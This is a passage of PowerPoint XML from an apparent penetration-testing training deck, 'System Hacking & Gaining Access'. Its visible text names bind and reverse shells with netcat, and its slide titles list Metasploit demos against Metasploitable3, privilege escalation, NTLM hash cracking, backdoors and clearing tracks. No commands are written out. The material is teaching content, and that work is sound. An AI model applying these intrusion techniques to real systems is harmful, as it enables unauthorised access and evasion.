              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There is two types of shell:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bind Shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse Shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="366627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rmAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Understanding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Bind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> Shell using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55101EB7-B2CA-8CC1-CE62-8CC533CC466B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1546346" y="1609078"/>
            <a:ext cx="9738894" cy="4342860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="52967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CBF-415E-F3F9-E94B-89BCF80F1602}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="685800"/>
            <a:ext cx="9601200" cy="628095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
              <a:t>Understanding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" b="1" dirty="0"/>
              <a:t>Reverse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
              <a:t> Shell using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A310161D-5BCB-D2DC-FAC4-B53992C81FC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="1624614"/>
            <a:ext cx="9601200" cy="4242786"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B9A2C83-1636-3B64-7DAD-0D6BFD4B54A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="1424983"/>
            <a:ext cx="10035427" cy="4747217"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="151257713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2.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D9A38F-9A2C-42E5-9013-4C4B1FFCB4F6}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="71af3243-3dd4-4a8d-8c0d-dd76da1f02a5"/>
    <ds:schemaRef ds:uri="16c05727-aa75-4e4a-9b5f-8a80a1165891"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>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Crop design</Template>
  <TotalTime>0</TotalTime>
  <Words>2205</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>216</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Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>Crop</vt:lpstr>
      <vt:lpstr>SysteM Hacking &amp; Gaining Access</vt:lpstr>
      <vt:lpstr>System Hacking Lifecycle</vt:lpstr>
      <vt:lpstr>Gaining Access</vt:lpstr>
      <vt:lpstr>Vulnerability Exploitation</vt:lpstr>
      <vt:lpstr>Exploit &amp; Payload</vt:lpstr>
      <vt:lpstr>Exploit Source &amp; Usage</vt:lpstr>
      <vt:lpstr>Paylaod and Shell</vt:lpstr>
      <vt:lpstr>Understanding Bind Shell using Netcat (nc)</vt:lpstr>
      <vt:lpstr>Understanding Reverse Shell using Netcat (nc)</vt:lpstr>
      <vt:lpstr>Exploitation Tools</vt:lpstr>
      <vt:lpstr>Exploitation Framework (Metasploit)</vt:lpstr>
      <vt:lpstr>Exploitation Tools</vt:lpstr>
      <vt:lpstr>Exploitation Demo -1 (Metasploitable3)</vt:lpstr>
      <vt:lpstr>Exploitation Steps</vt:lpstr>
      <vt:lpstr>Exploitation Demo -2 (Metasploitable3)</vt:lpstr>
      <vt:lpstr>Initial Food Hold</vt:lpstr>
      <vt:lpstr>Privilege Escalation</vt:lpstr>
      <vt:lpstr>Privilege Escalation</vt:lpstr>
      <vt:lpstr>Privilege Escalation</vt:lpstr>
      <vt:lpstr>Privilege Escalation</vt:lpstr>
      <vt:lpstr>NTLM Hash Extract and Cracking</vt:lpstr>
      <vt:lpstr>NTLM Hash Extract and Cracking</vt:lpstr>
      <vt:lpstr>Password Cracking with Hashcat</vt:lpstr>
      <vt:lpstr>Implement backdoor for Maintain Access</vt:lpstr>
      <vt:lpstr>Clear the tracks</vt:lpstr>
      <vt:lpstr>Exploitation Demo -3 (Metasploitable3)</vt:lpstr>
      <vt:lpstr>Scanning</vt:lpstr>
      <vt:lpstr>Vulnerability Identification</vt:lpstr>
      <vt:lpstr>Exploit preparation</vt:lpstr>
      <vt:lpstr>Exploitation Phase</vt:lpstr>
      <vt:lpstr>Getting Reverse Shell</vt:lpstr>
      <vt:lpstr>Privilege Escalation &amp; File Transfer</vt:lpstr>
      <vt:lpstr>Privilege Escalation &amp; File Transfer</vt:lpstr>
      <vt:lpstr>Privilege Escalation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2023-05-24T15:08:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-24T14:10:30Z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2023-09-18T16:32:54Z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f744bfb0-7a2c-421a-bff5-a72c0edac6af</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_defa4170-0d19-0005-0004-bc88714345d2_ActionId">
    <vt:lpwstr>ecfe6d52-365b-472f-afec-95a102f4591f</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="MSIP_Label_defa4170-0d19-0005-0004-bc88714345d2_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
</Properties>
</file>